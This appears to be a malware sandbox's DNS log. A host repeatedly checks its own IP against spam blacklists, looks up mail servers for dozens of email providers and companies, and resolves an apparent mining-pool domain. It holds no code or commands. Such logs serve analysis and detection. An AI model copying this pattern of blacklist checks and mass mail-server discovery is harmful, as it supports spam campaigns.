Sep 5, 2021 15:50:12.670022011 CEST	8.8.8.8	192.168.2.4	0x9bb	Name error (3)	41.52.17.84.dnsbl.sorbs.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:12.721162081 CEST	8.8.8.8	192.168.2.4	0x594a	Name error (3)	41.52.17.84.bl.spamcop.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:12.726155043 CEST	8.8.8.8	192.168.2.4	0x521b	No error (0)	comcast.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:12.726155043 CEST	8.8.8.8	192.168.2.4	0x521b	No error (0)	comcast.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:12.773405075 CEST	8.8.8.8	192.168.2.4	0xc6d5	No error (0)	mx1.comcast.net		96.114.157.80	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:12.779628992 CEST	8.8.8.8	192.168.2.4	0x1fe7	No error (0)	freenet.de			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:12.792764902 CEST	8.8.8.8	192.168.2.4	0x51d2	No error (0)	www.google.com		172.217.168.68	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:12.797904968 CEST	8.8.8.8	192.168.2.4	0x1e12	Name error (3)	41.52.17.84.zen.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.012001991 CEST	8.8.8.8	192.168.2.4	0x9c74	No error (0)	emig.freenet.de		195.4.92.218	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.012001991 CEST	8.8.8.8	192.168.2.4	0x9c74	No error (0)	emig.freenet.de		195.4.92.215	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.012001991 CEST	8.8.8.8	192.168.2.4	0x9c74	No error (0)	emig.freenet.de		195.4.92.217	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.012001991 CEST	8.8.8.8	192.168.2.4	0x9c74	No error (0)	emig.freenet.de		195.4.92.216	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.014817953 CEST	8.8.8.8	192.168.2.4	0xb75b	No error (0)	sydstu.catholic.edu.au			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:13.014817953 CEST	8.8.8.8	192.168.2.4	0xb75b	No error (0)	sydstu.catholic.edu.au			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:13.014817953 CEST	8.8.8.8	192.168.2.4	0xb75b	No error (0)	sydstu.catholic.edu.au			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:13.014817953 CEST	8.8.8.8	192.168.2.4	0xb75b	No error (0)	sydstu.catholic.edu.au			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:13.014817953 CEST	8.8.8.8	192.168.2.4	0xb75b	No error (0)	sydstu.catholic.edu.au			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:13.014817953 CEST	8.8.8.8	192.168.2.4	0xb75b	No error (0)	sydstu.catholic.edu.au			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:13.014817953 CEST	8.8.8.8	192.168.2.4	0xb75b	No error (0)	sydstu.catholic.edu.au			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:13.014858961 CEST	8.8.8.8	192.168.2.4	0x99ae	No error (0)	www.google.com		172.217.168.68	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.030685902 CEST	8.8.8.8	192.168.2.4	0x3816	Name error (3)	41.52.17.84.sbl-xbl.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.062671900 CEST	8.8.8.8	192.168.2.4	0x7566	No error (0)	aspmx.l.google.com		108.177.119.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.064461946 CEST	8.8.8.8	192.168.2.4	0x1843	No error (0)	gmail.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:13.064461946 CEST	8.8.8.8	192.168.2.4	0x1843	No error (0)	gmail.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:13.064461946 CEST	8.8.8.8	192.168.2.4	0x1843	No error (0)	gmail.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:13.064461946 CEST	8.8.8.8	192.168.2.4	0x1843	No error (0)	gmail.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:13.064461946 CEST	8.8.8.8	192.168.2.4	0x1843	No error (0)	gmail.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:13.068756104 CEST	8.8.8.8	192.168.2.4	0xa756	No error (0)	www.google.com		172.217.168.68	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.078598022 CEST	8.8.8.8	192.168.2.4	0x8e0c	Name error (3)	41.52.17.84.cbl.abuseat.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.098510981 CEST	8.8.8.8	192.168.2.4	0x6b66	No error (0)	live.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:13.114670038 CEST	8.8.8.8	192.168.2.4	0x7d34	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.114907026 CEST	8.8.8.8	192.168.2.4	0xb1f0	Name error (3)	41.52.17.84.dnsbl.sorbs.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.136861086 CEST	8.8.8.8	192.168.2.4	0xd9c3	No error (0)	live-com.olc.protection.outlook.com		104.47.8.33	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.136861086 CEST	8.8.8.8	192.168.2.4	0xd9c3	No error (0)	live-com.olc.protection.outlook.com		104.47.10.33	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.152899027 CEST	8.8.8.8	192.168.2.4	0x266c	No error (0)	t-online.de			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:13.152899027 CEST	8.8.8.8	192.168.2.4	0x266c	No error (0)	t-online.de			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:13.152899027 CEST	8.8.8.8	192.168.2.4	0x266c	No error (0)	t-online.de			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:13.152899027 CEST	8.8.8.8	192.168.2.4	0x266c	No error (0)	t-online.de			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:13.154166937 CEST	8.8.8.8	192.168.2.4	0xb607	Name error (3)	41.52.17.84.bl.spamcop.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.170800924 CEST	8.8.8.8	192.168.2.4	0x3e66	No error (0)	www.google.com		172.217.168.68	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.193139076 CEST	8.20.247.20	192.168.2.4	0x100	No error (0)	41.52.17.84.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 5, 2021 15:50:13.227616072 CEST	8.8.8.8	192.168.2.4	0xd96e	No error (0)	mx00.t-online.de		194.25.134.8	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.229737997 CEST	8.8.8.8	192.168.2.4	0xf1aa	Name error (3)	41.52.17.84.zen.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.242703915 CEST	8.8.8.8	192.168.2.4	0x9027	No error (0)	www.google.com		172.217.168.68	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.286159992 CEST	8.8.8.8	192.168.2.4	0xa08c	Name error (3)	41.52.17.84.sbl-xbl.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.357786894 CEST	8.8.8.8	192.168.2.4	0x608e	No error (0)	aol.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:13.368453026 CEST	8.8.8.8	192.168.2.4	0xcb43	No error (0)	mx00.t-online.de		194.25.134.8	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.746357918 CEST	8.8.8.8	192.168.2.4	0x8ba5	No error (0)	fastpool.xyz		213.91.128.133	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.809509993 CEST	8.8.8.8	192.168.2.4	0x68b3	No error (0)	www.google.com		172.217.168.68	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.812932014 CEST	8.8.8.8	192.168.2.4	0x7a0a	No error (0)	online.fr			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:13.812932014 CEST	8.8.8.8	192.168.2.4	0x7a0a	No error (0)	online.fr			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:13.813786983 CEST	8.8.8.8	192.168.2.4	0x3faa	No error (0)	41.52.17.84.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 5, 2021 15:50:13.814960003 CEST	8.8.8.8	192.168.2.4	0x52e4	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.204.80	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.814960003 CEST	8.8.8.8	192.168.2.4	0x52e4	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.204.75	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.814960003 CEST	8.8.8.8	192.168.2.4	0x52e4	No error (0)	mx-aol.mail.gm0.yahoodns.net		98.136.96.92	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.814960003 CEST	8.8.8.8	192.168.2.4	0x52e4	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.228.86	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.814960003 CEST	8.8.8.8	192.168.2.4	0x52e4	No error (0)	mx-aol.mail.gm0.yahoodns.net		98.136.96.93	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.814960003 CEST	8.8.8.8	192.168.2.4	0x52e4	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.228.84	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.816441059 CEST	8.8.8.8	192.168.2.4	0x6dac	Name error (3)	41.52.17.84.cbl.abuseat.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.907111883 CEST	8.8.8.8	192.168.2.4	0x1e71	No error (0)	mx1.free.fr		212.27.48.6	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.907111883 CEST	8.8.8.8	192.168.2.4	0x1e71	No error (0)	mx1.free.fr		212.27.48.7	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:13.919981956 CEST	8.8.8.8	192.168.2.4	0xc4d1	No error (0)	btinternet.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:13.957583904 CEST	8.8.8.8	192.168.2.4	0x4ed7	No error (0)	mx.lb.btinternet.com		213.120.69.2	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:14.005183935 CEST	8.8.8.8	192.168.2.4	0xbdd3	No error (0)	controlling.cz			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:14.054896116 CEST	8.8.8.8	192.168.2.4	0x138b	No error (0)	op.pl			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:14.073230982 CEST	8.8.8.8	192.168.2.4	0x7240	No error (0)	controlling-cz.mail.protection.outlook.com		104.47.13.36	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:14.073230982 CEST	8.8.8.8	192.168.2.4	0x7240	No error (0)	controlling-cz.mail.protection.outlook.com		104.47.12.36	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:14.268939972 CEST	8.8.8.8	192.168.2.4	0x86f9	No error (0)	epicgames.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:14.268939972 CEST	8.8.8.8	192.168.2.4	0x86f9	No error (0)	epicgames.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:14.270991087 CEST	8.8.8.8	192.168.2.4	0x712d	No error (0)	mx.poczta.onet.pl		213.180.147.146	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:14.402479887 CEST	8.8.8.8	192.168.2.4	0x93a	No error (0)	hotmail.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:14.441848040 CEST	8.8.8.8	192.168.2.4	0x7d4e	No error (0)	mxa-003d3601.gslb.pphosted.com		205.220.166.52	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:14.505887985 CEST	8.8.8.8	192.168.2.4	0x6161	No error (0)	mx1.comcast.net		96.114.157.80	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:14.534182072 CEST	8.8.8.8	192.168.2.4	0xca46	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.57.161	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:14.534182072 CEST	8.8.8.8	192.168.2.4	0xca46	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.56.161	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:14.684766054 CEST	8.8.8.8	192.168.2.4	0xd0b3	No error (0)	bacavalley.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:14.684766054 CEST	8.8.8.8	192.168.2.4	0xd0b3	No error (0)	bacavalley.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:14.684766054 CEST	8.8.8.8	192.168.2.4	0xd0b3	No error (0)	bacavalley.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:14.684766054 CEST	8.8.8.8	192.168.2.4	0xd0b3	No error (0)	bacavalley.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:14.778263092 CEST	8.8.8.8	192.168.2.4	0xa3d6	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:14.865490913 CEST	8.8.8.8	192.168.2.4	0x90da	No error (0)	bacavalley.com.mx1.greymail.rcimx.net		208.80.202.60	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:14.865490913 CEST	8.8.8.8	192.168.2.4	0x90da	No error (0)	bacavalley.com.mx1.greymail.rcimx.net		208.80.203.60	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:15.102849960 CEST	8.8.8.8	192.168.2.4	0xedf6	No error (0)	o2.pl			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:15.104316950 CEST	8.8.8.8	192.168.2.4	0x2f9	No error (0)	mx00.t-online.de		194.25.134.8	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:15.156688929 CEST	8.8.8.8	192.168.2.4	0xc373	No error (0)	mx.tlen.pl		193.222.135.150	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:15.234870911 CEST	8.8.8.8	192.168.2.4	0xa764	No error (0)	online.de			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:15.234870911 CEST	8.8.8.8	192.168.2.4	0xa764	No error (0)	online.de			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:15.309674025 CEST	8.8.8.8	192.168.2.4	0x177c	No error (0)	mx00.emig.kundenserver.de		212.227.15.40	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:15.321468115 CEST	8.8.8.8	192.168.2.4	0x58fb	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:15.337776899 CEST	8.8.8.8	192.168.2.4	0x7a89	No error (0)	mx00.t-online.de		194.25.134.8	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:15.586196899 CEST	8.8.8.8	192.168.2.4	0xc781	No error (0)	lycos.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:15.650070906 CEST	8.8.8.8	192.168.2.4	0x1f82	No error (0)	mx.lycos.com.cust.b.hostedemail.com		64.98.36.4	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:15.660304070 CEST	8.8.8.8	192.168.2.4	0xb11d	No error (0)	hanmail.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:15.660304070 CEST	8.8.8.8	192.168.2.4	0xb11d	No error (0)	hanmail.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:15.660304070 CEST	8.8.8.8	192.168.2.4	0xb11d	No error (0)	hanmail.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:15.660304070 CEST	8.8.8.8	192.168.2.4	0xb11d	No error (0)	hanmail.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:15.907459974 CEST	8.8.8.8	192.168.2.4	0x6930	No error (0)	dbmail.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:15.909718990 CEST	8.8.8.8	192.168.2.4	0xfdc3	No error (0)	mx4.hanmail.net		211.231.108.176	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:15.998980999 CEST	8.8.8.8	192.168.2.4	0xbe56	No error (0)	baccaro.eu			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:15.998980999 CEST	8.8.8.8	192.168.2.4	0xbe56	No error (0)	baccaro.eu			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:15.998980999 CEST	8.8.8.8	192.168.2.4	0xbe56	No error (0)	baccaro.eu			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:15.998980999 CEST	8.8.8.8	192.168.2.4	0xbe56	No error (0)	baccaro.eu			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:15.998980999 CEST	8.8.8.8	192.168.2.4	0xbe56	No error (0)	baccaro.eu			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:16.173453093 CEST	8.8.8.8	192.168.2.4	0x3be5	No error (0)	194019900.pamx1.hotmail.com		104.47.58.33	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:16.173453093 CEST	8.8.8.8	192.168.2.4	0x3be5	No error (0)	194019900.pamx1.hotmail.com		104.47.55.33	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:16.182960987 CEST	8.8.8.8	192.168.2.4	0x5715	No error (0)	me.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:16.182960987 CEST	8.8.8.8	192.168.2.4	0x5715	No error (0)	me.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:16.195626020 CEST	8.8.8.8	192.168.2.4	0x553c	No error (0)	aspmx.l.google.com		108.177.119.26	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:16.235105991 CEST	8.8.8.8	192.168.2.4	0x1dce	No error (0)	mx01.mail.icloud.com		17.42.251.10	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:16.235105991 CEST	8.8.8.8	192.168.2.4	0x1dce	No error (0)	mx01.mail.icloud.com		17.56.9.17	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:16.235105991 CEST	8.8.8.8	192.168.2.4	0x1dce	No error (0)	mx01.mail.icloud.com		17.57.152.9	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:16.235105991 CEST	8.8.8.8	192.168.2.4	0x1dce	No error (0)	mx01.mail.icloud.com		17.57.154.6	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:16.235105991 CEST	8.8.8.8	192.168.2.4	0x1dce	No error (0)	mx01.mail.icloud.com		17.57.154.23	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:16.248403072 CEST	8.8.8.8	192.168.2.4	0xf85	No error (0)	mx4.hanmail.net		211.231.108.176	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:16.814538002 CEST	8.8.8.8	192.168.2.4	0xfb6d	No error (0)	gmx.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:16.814538002 CEST	8.8.8.8	192.168.2.4	0xfb6d	No error (0)	gmx.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:16.853050947 CEST	8.8.8.8	192.168.2.4	0x4344	No error (0)	mx01.emig.gmx.net		212.227.17.5	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:16.922132015 CEST	8.8.8.8	192.168.2.4	0xe31d	No error (0)	agilysse.fr			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:16.922132015 CEST	8.8.8.8	192.168.2.4	0xe31d	No error (0)	agilysse.fr			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:17.046379089 CEST	8.8.8.8	192.168.2.4	0xa150	No error (0)	mx1.comcast.net		96.114.157.80	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:17.047657013 CEST	8.8.8.8	192.168.2.4	0xff70	No error (0)	mx4.mail.ovh.net		178.32.124.207	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:17.119570971 CEST	8.8.8.8	192.168.2.4	0x18c	No error (0)	colpal.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:17.119570971 CEST	8.8.8.8	192.168.2.4	0x18c	No error (0)	colpal.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:17.119570971 CEST	8.8.8.8	192.168.2.4	0x18c	No error (0)	colpal.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:17.216511965 CEST	8.8.8.8	192.168.2.4	0x96a1	No error (0)	mailstream-east.mxrecord.io		54.162.196.70	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:17.216511965 CEST	8.8.8.8	192.168.2.4	0x96a1	No error (0)	mailstream-east.mxrecord.io		54.158.96.71	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:17.216511965 CEST	8.8.8.8	192.168.2.4	0x96a1	No error (0)	mailstream-east.mxrecord.io		3.229.126.3	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:17.542788029 CEST	8.8.8.8	192.168.2.4	0x89e9	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:18.214354992 CEST	8.8.8.8	192.168.2.4	0x8952	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:18.576502085 CEST	8.8.8.8	192.168.2.4	0x1f82	No error (0)	yahoo.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:18.576502085 CEST	8.8.8.8	192.168.2.4	0x1f82	No error (0)	yahoo.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:18.576502085 CEST	8.8.8.8	192.168.2.4	0x1f82	No error (0)	yahoo.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:18.617397070 CEST	8.8.8.8	192.168.2.4	0x5d74	No error (0)	mta6.am0.yahoodns.net		67.195.228.111	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:18.617397070 CEST	8.8.8.8	192.168.2.4	0x5d74	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:18.617397070 CEST	8.8.8.8	192.168.2.4	0x5d74	No error (0)	mta6.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:18.617397070 CEST	8.8.8.8	192.168.2.4	0x5d74	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:18.617397070 CEST	8.8.8.8	192.168.2.4	0x5d74	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:18.617397070 CEST	8.8.8.8	192.168.2.4	0x5d74	No error (0)	mta6.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:18.617397070 CEST	8.8.8.8	192.168.2.4	0x5d74	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:18.617397070 CEST	8.8.8.8	192.168.2.4	0x5d74	No error (0)	mta6.am0.yahoodns.net		67.195.228.109	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:19.030550957 CEST	8.8.8.8	192.168.2.4	0x36d8	No error (0)	seznam.cz			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:19.030550957 CEST	8.8.8.8	192.168.2.4	0x36d8	No error (0)	seznam.cz			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:19.234652996 CEST	8.8.8.8	192.168.2.4	0x4248	No error (0)	mx1.seznam.cz		77.75.76.42	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:19.234652996 CEST	8.8.8.8	192.168.2.4	0x4248	No error (0)	mx1.seznam.cz		77.75.78.42	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:20.144129038 CEST	8.8.8.8	192.168.2.4	0xd7c2	No error (0)	www.google.co.cr		172.217.168.67	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.015593052 CEST	8.8.8.8	192.168.2.4	0x907a	Name error (3)	41.52.17.84.dnsbl.sorbs.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.067312956 CEST	8.8.8.8	192.168.2.4	0x16d9	Name error (3)	41.52.17.84.bl.spamcop.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.112545967 CEST	8.8.8.8	192.168.2.4	0x40e7	Name error (3)	41.52.17.84.zen.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.157217979 CEST	8.8.8.8	192.168.2.4	0xee72	Name error (3)	41.52.17.84.sbl-xbl.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.221899033 CEST	8.8.8.8	192.168.2.4	0x569d	Name error (3)	41.52.17.84.cbl.abuseat.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.324413061 CEST	8.8.8.8	192.168.2.4	0xa1ac	Name error (3)	41.52.17.84.dnsbl.sorbs.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.373390913 CEST	8.8.8.8	192.168.2.4	0xb9bc	Name error (3)	41.52.17.84.bl.spamcop.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.425487041 CEST	8.8.8.8	192.168.2.4	0xf1a7	Name error (3)	41.52.17.84.zen.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.452821016 CEST	8.8.8.8	192.168.2.4	0x880a	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.204.80	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.452821016 CEST	8.8.8.8	192.168.2.4	0x880a	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.204.75	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.452821016 CEST	8.8.8.8	192.168.2.4	0x880a	No error (0)	mx-aol.mail.gm0.yahoodns.net		98.136.96.92	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.452821016 CEST	8.8.8.8	192.168.2.4	0x880a	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.228.86	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.452821016 CEST	8.8.8.8	192.168.2.4	0x880a	No error (0)	mx-aol.mail.gm0.yahoodns.net		98.136.96.93	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.452821016 CEST	8.8.8.8	192.168.2.4	0x880a	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.228.84	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.471404076 CEST	8.8.8.8	192.168.2.4	0xcb4e	Name error (3)	41.52.17.84.sbl-xbl.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.514034033 CEST	8.8.8.8	192.168.2.4	0xe56b	Name error (3)	41.52.17.84.cbl.abuseat.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.794117928 CEST	8.8.8.8	192.168.2.4	0x50f3	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.794117928 CEST	8.8.8.8	192.168.2.4	0x50f3	No error (0)	mta6.am0.yahoodns.net		67.195.204.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.794117928 CEST	8.8.8.8	192.168.2.4	0x50f3	No error (0)	mta6.am0.yahoodns.net		98.136.96.75	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.794117928 CEST	8.8.8.8	192.168.2.4	0x50f3	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.794117928 CEST	8.8.8.8	192.168.2.4	0x50f3	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.794117928 CEST	8.8.8.8	192.168.2.4	0x50f3	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.794117928 CEST	8.8.8.8	192.168.2.4	0x50f3	No error (0)	mta6.am0.yahoodns.net		98.136.96.76	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:22.794117928 CEST	8.8.8.8	192.168.2.4	0x50f3	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:23.214179039 CEST	8.8.8.8	192.168.2.4	0x429	No error (0)	mx1.comcast.net		96.114.157.80	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:23.393438101 CEST	8.8.8.8	192.168.2.4	0xe9ba	No error (0)	microsoft-com.mail.protection.outlook.com		104.47.53.36	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:23.393438101 CEST	8.8.8.8	192.168.2.4	0xe9ba	No error (0)	microsoft-com.mail.protection.outlook.com		52.101.24.0	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:23.489670038 CEST	8.8.8.8	192.168.2.4	0x93e2	No error (0)	att.net			MX (Mail exchange)	IN (0x0001)
